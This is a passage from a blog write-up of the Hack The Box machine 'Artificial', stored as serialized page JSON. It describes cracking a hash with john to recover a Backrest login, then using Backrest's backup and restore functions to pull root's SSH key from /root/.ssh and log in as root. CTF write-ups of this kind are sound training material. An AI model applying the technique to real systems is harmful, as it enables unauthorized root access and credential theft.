hash.txt\n",{"type":24,"tag":297,"props":2167,"children":2168},{"class":299,"line":326},[2169,2174],{"type":24,"tag":297,"props":2170,"children":2171},{"style":344},[2172],{"type":34,"value":2173},"john",{"type":24,"tag":297,"props":2175,"children":2176},{"style":405},[2177],{"type":34,"value":2165},{"type":24,"tag":25,"props":2179,"children":2181},{"src":2180},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F35.jpg",[],{"type":24,"tag":30,"props":2183,"children":2184},{},[2185,2187,2193],{"type":34,"value":2186},"And as a result, we get the pair ",{"type":24,"tag":66,"props":2188,"children":2190},{"className":2189,"id":86,"style":87},[85],[2191],{"type":34,"value":2192},"backrest_root:!@#$%^",{"type":34,"value":2194},". With this information, we can log in to our tunneled backrest interface.",{"type":24,"tag":25,"props":2196,"children":2198},{"src":2197},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F36.jpg",[],{"type":24,"tag":2200,"props":2201,"children":2203},"h4",{"id":2202},"backrest-webui",[2204],{"type":34,"value":2205},"backrest webui",{"type":24,"tag":30,"props":2207,"children":2208},{},[2209],{"type":34,"value":2210},"When we examine it here, we don't have any other options, it immediately comes to mind that if we back up important folders and download them, we can get something. I personally proceeded by trial and error without looking at the user manual and was able to achieve what I wanted. In order;",{"type":24,"tag":30,"props":2212,"children":2213},{},[2214,2216,2222,2223,2229],{"type":34,"value":2215},"From the new repo creation section, we create a repo with the following values. (My goal is to get the ",{"type":24,"tag":66,"props":2217,"children":2219},{"className":2218},[],[2220],{"type":34,"value":2221},"id_rsa",{"type":34,"value":1410},{"type":24,"tag":66,"props":2224,"children":2226},{"className":2225},[],[2227],{"type":34,"value":2228},"\u002Froot\u002F.ssh",{"type":34,"value":2230}," folder.)",{"type":24,"tag":25,"props":2232,"children":2234},{"src":2233},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F37.jpg",[],{"type":24,"tag":25,"props":2236,"children":2238},{"src":2237},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F38.jpg",[],{"type":24,"tag":120,"props":2240,"children":2241},{},[2242],{"type":24,"tag":124,"props":2243,"children":2244},{},[2245],{"type":34,"value":2246},"Here I created a repo by filling only the first three parts.",{"type":24,"tag":30,"props":2248,"children":2249},{},[2250],{"type":34,"value":2251},"Then I tried to create a plan.",{"type":24,"tag":25,"props":2253,"children":2255},{"src":2254},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F39.jpg",[],{"type":24,"tag":120,"props":2257,"children":2258},{},[2259],{"type":24,"tag":124,"props":2260,"children":2261},{},[2262],{"type":34,"value":2263},"I did this by filling in the first three parts. In the 2nd part, we select the repo we created in step 1.",{"type":24,"tag":30,"props":2265,"children":2266},{},[2267],{"type":34,"value":2268},"As a result, we get this page.",{"type":24,"tag":25,"props":2270,"children":2272},{"src":2271},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F40.jpg",[],{"type":24,"tag":30,"props":2274,"children":2275},{},[2276,2278,2284],{"type":34,"value":2277},"Now let's click on ",{"type":24,"tag":66,"props":2279,"children":2281},{"className":2280},[],[2282],{"type":34,"value":2283},"backup now",{"type":34,"value":2285}," from here. Now our backup has been taken, let's proceed from the repo section and restore this backup we took.",{"type":24,"tag":25,"props":2287,"children":2289},{"src":2288},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F41.jpg",[],{"type":24,"tag":30,"props":2291,"children":2292},{},[2293],{"type":34,"value":2294},"Now let's download the restored file.",{"type":24,"tag":25,"props":2296,"children":2298},{"src":2297},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F42.jpg",[],{"type":24,"tag":30,"props":2300,"children":2301},{},[2302],{"type":34,"value":2303},"Now this file will have our ssh key for root. With this, we can directly connect as root with ssh.",{"type":24,"tag":25,"props":2305,"children":2307},{"src":2306},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F43.jpg",[],{"type":24,"tag":25,"props":2309,"children":2311},{"src":2310},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F44.jpg",[],{"type":24,"tag":25,"props":2313,"children":2317},{"src":2314,":height":2315,":width":2316},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002Fköksal-baba.gif","445","498",[],{"type":24,"tag":2319,"props":2320,"children":2321},"style",{},[2322],{"type":34,"value":2323},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":367,"depth":367,"links":2325},[2326,2327,2328],{"id":48,"depth":326,"text":51},{"id":216,"depth":326,"text":219},{"id":1249,"depth":326,"text":1252,"children":2329},[2330,2331],{"id":1256,"depth":335,"text":1259},{"id":1364,"depth":335,"text":1367,"children":2332},[2333],{"id":2202,"depth":367,"text":2205},"markdown","content:posts:2025:htb-artificial-writeup.md","content","posts\u002F2025\u002Fhtb-artificial-writeup.md","posts\u002F2025\u002Fhtb-artificial-writeup","md","\u002Fposts",[2342,2346],{"_path":2343,"title":2344,"date":2345},"\u002F2025\u002Fhtb-cap-writeup","HTB - Cap","2025-10-27T15:49:55.000Z",{"_path":2347,"title":2348,"date":2349},"\u002F2025\u002Ftryhackme-mrrobot-writeup","TryHackMe - Mr.Robot","2025-11-05T06:21:29.000Z",1776877918974]